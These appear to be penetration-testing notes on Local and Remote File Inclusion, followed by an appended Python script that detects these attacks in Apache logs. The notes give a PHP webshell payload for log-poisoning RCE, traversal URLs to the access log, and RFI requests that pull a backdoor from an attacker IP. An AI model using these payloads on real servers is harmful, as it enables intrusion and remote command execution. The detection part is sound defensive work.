LFI & RFI

Local File Inclusion

Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s running code, allowing us to execute local or remote files.

Log Injection

Display the contents of a log file (if directory traversal is present):

http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log

It should contain entries like the following:

10.10.14.1 - - [19/Jun/2024:12:11:34 +0000] "GET /app/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

The User-Agent header is written to the log, so we can then edit it to the following in Burp for RCE:

<?php echo system($_GET['cmd']); ?>

Now, when we request the access log and add our command with the cmd parameter, it will execute:

http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log&cmd=whoami

On Windows, the Apache logs are located at C:\xampp\apache\logs\

Remote File Inclusion

Same concept as LFI, except with remote files that can be accessed over HTTP or SMB. The allow_url_include option needs to be enabled within the PHP application to leverage this.

/usr/share/webshells/php/simple-backdoor.php
http://adot.com/app/index.php?page=http://10.10.14.10/simple-backdoor.php&cmd=whoami
http://adot.com/app/index.php?page=http://10.10.14.10/shell.php
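
Both the log injection and the remote inclusion requests above leave recognisable traces in the access log. The following detection example is added here and is not part of the original notes: it scans Apache combined-format lines for a PHP open tag in any client-controlled field, traversal segments in query parameters, and HTTP or SMB locations passed as parameter values. The sample lines are constructed from the requests shown on this page; the function names and finding labels are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format; request, Referer and User-Agent are client-controlled.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" \d{3} \S+ "(.*?)" "(.*)"$')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)            # PHP open tag inside a log field
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')  # ../ or ..\ path segment
REMOTE = re.compile(r'^(?:https?://|\\\\)', re.I)      # HTTP(S) URL or SMB UNC path

# Constructed sample lines (not real traffic), modelled on the requests on this page.
SAMPLE = r'''
10.10.14.1 - - [19/Jun/2024:12:11:34 +0000] "GET /app/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.14.1 - - [19/Jun/2024:12:15:02 +0000] "GET /app/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "<?php echo system($_GET['cmd']); ?>"
10.10.14.1 - - [19/Jun/2024:12:16:40 +0000] "GET /app/index.php?page=..%2f..%2f..%2f..%2f..%2fvar/log/apache2/access.log&cmd=whoami HTTP/1.1" 200 9034 "-" "Mozilla/5.0"
10.10.14.1 - - [19/Jun/2024:12:20:11 +0000] "GET /app/index.php?page=http://10.10.14.10/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''.strip().splitlines()

def scan_line(line):
    """Return the set of finding labels for one access-log line."""
    findings = set()
    m = LINE_RE.match(line.strip())
    if not m:
        # Unparsable lines still get the raw PHP-tag check.
        return {"php-tag-in-log"} if PHP_TAG.search(line) else findings
    _host, request, referer, agent = m.groups()
    if any(PHP_TAG.search(field) for field in (request, referer, agent)):
        findings.add("php-tag-in-log")
    parts = request.split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    # parse_qsl percent-decodes values, so ..%2f is caught as well as ../
    for _name, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        if TRAVERSAL.search(value):
            findings.add("path-traversal-param")
        if REMOTE.match(value):
            findings.add("remote-include-param")
    return findings

def scan(lines):
    """Return [(line_number, client, sorted findings)] for lines with findings."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = scan_line(line)
        if found:
            hits.append((number, line.split(" ", 1)[0], sorted(found)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A PHP open tag in a logged header is the earliest signal here, since it appears before any request that includes the log.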
